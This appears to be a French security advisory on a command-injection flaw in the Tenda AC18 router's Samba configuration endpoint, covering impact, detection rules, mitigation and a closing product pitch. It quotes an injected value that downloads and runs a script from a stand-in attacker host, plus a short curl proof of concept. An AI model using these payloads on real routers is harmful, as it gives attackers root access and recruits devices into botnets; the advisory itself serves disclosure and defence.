Le 27 avril 2026, une nouvelle CVE classée CVSS 9.8 a été publiée affectant le routeur Tenda AC18 sur firmware V15.03.05.05_multi. Située dans l'endpoint /goform/SetSambaCfg, la vulnérabilité permet à un attaquant non authentifié d'exécuter des commandes arbitraires en injectant du shell dans le paramètre guestuser. Le routeur AC18 étant vendu par millions auprès des particuliers et petites entreprises, cette faille pose un risque immédiat à l'échelle d'Internet.
Détails techniques
L'endpoint /goform/SetSambaCfg traite la configuration du serveur Samba intégré au routeur, utilisé pour partager des fichiers via clé USB. Le paramètre guestuser (nom de l'utilisateur invité Samba) est concaténé directement dans une commande shell — typiquement un appel à useradd ou smbpasswd — sans aucune sanitization.
Un attaquant injecte une charge utile shell dans guestuser :
guestuser=invite;wget http://attacker/p.sh|sh;
Le binaire backend exécute alors successivement la commande légitime puis la charge utile, fournissant à l'attaquant un shell distant sur le routeur en tant que root.
Caractéristiques
| Champ | Valeur |
|---|---|
| CVSS 3.1 | 9.8 (CRITICAL) |
| Vecteur | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-78 (OS Command Injection) |
| Authentification | Aucune |
| Exploit public | Oui (PoC publié) |
| Privilèges obtenus | root |
Produits et versions affectés
| Produit | Version firmware | Statut |
|---|---|---|
| Tenda AC18 | V15.03.05.05_multi | ❌ Vulnérable |
À la date de publication de cet article, Tenda n'a pas publié de firmware corrigé officiel. Vérifiez régulièrement la page support du produit ainsi que l'inventaire CVE de votre parc.
Exploitation et impact
Vecteur d'attaque
Si l'interface d'administration du routeur est accessible depuis Internet — configuration courante chez les utilisateurs particuliers ayant activé l'accès distant — l'exploitation est triviale via une simple requête HTTP POST.
Conséquences post-compromission
- Persistance complète : ajout d'utilisateurs root, modification du firmware
- Pivot LAN : accès à tous les équipements derrière le routeur (caméras IP, NAS, postes utilisateurs)
- Recrutement botnet : Mirai et ses variantes ciblent activement les routeurs Tenda
- Vol de credentials : sniffing du trafic interne, redirection DNS pour phishing
- Crypto-mining : utilisation des ressources du routeur pour miner
PoC public
curl -X POST "http://<router-ip>/goform/SetSambaCfg" \
-d "guestuser=user;id>/tmp/pwn;"
L'attaque ne nécessite pas de compte. Toute IP capable de joindre l'interface admin peut compromettre le routeur en moins d'une seconde.
Détection et IOC
Sur le réseau (firewall amont, IDS)
# Suricata / Snort — détection de payload shell sur SetSambaCfg
alert http any any -> any any (msg:"Tenda AC18 SetSambaCfg command injection"; \
flow:to_server,established; http.uri; content:"/goform/SetSambaCfg"; \
http.request_body; pcre:"/guestuser=[^&]*[;&|`]/"; sid:2026031255; rev:1;)
Sur le routeur (si vous y avez accès console)
- Vérifier
ps,crontab,iptablespour des entrées inattendues - Inspecter
/tmp/,/var/log/messages,/dev/shm - Vérifier les comptes Samba créés via
pdbedit -L
Indicateurs réseau
- Connexions sortantes vers des C2 (Mirai utilise typiquement des IRC ou des TCP customisés)
- Trafic DNS anormal (résolutions de domaines suspects)
- Requêtes POST sur
/goform/SetSambaCfgdepuis IPs externes inconnues
Mitigation
Action prioritaire
- Désactiver l'accès distant à l'administration depuis Internet
- Désactiver Samba si vous n'utilisez pas le partage de fichiers : Settings → USB Application → Samba → Disable
- Restreindre l'accès LAN au panneau d'administration à une seule IP de management
Workaround temporaire
Si vous opérez un firewall amont, bloquez toute requête POST contenant des séparateurs shell vers /goform/SetSambaCfg. Si vous n'avez pas de firewall amont mais un autre routeur disponible, mettez le AC18 derrière en mode AP simple (sans NAT/firewall) et utilisez le second routeur comme passerelle Internet.
Solution durable
- Remplacer l'équipement si Tenda ne publie pas de patch dans les semaines suivant la divulgation
- Migrer vers OpenWrt sur les modèles compatibles (vérifier la matrice de support OpenWrt avant achat)
Pourquoi surveiller en continu votre parc
Les routeurs grand public et SMB représentent un point d'entrée privilégié pour les attaquants : exposés à Internet, rarement patchés, et avec un cycle de support court. Maintenir un inventaire à jour avec alertes automatiques est le seul moyen de détecter à temps une CVE comme CVE-2026-31255 et d'éviter qu'un équipement en bout de support ne devienne le maillon faible de votre infrastructure.
Avec cveo.tech, inventoriez vos routeurs et équipements réseau et recevez un email automatique dès qu'une CVE critique cible une de vos versions, pour décider du patch ou du remplacement avant les attaquants.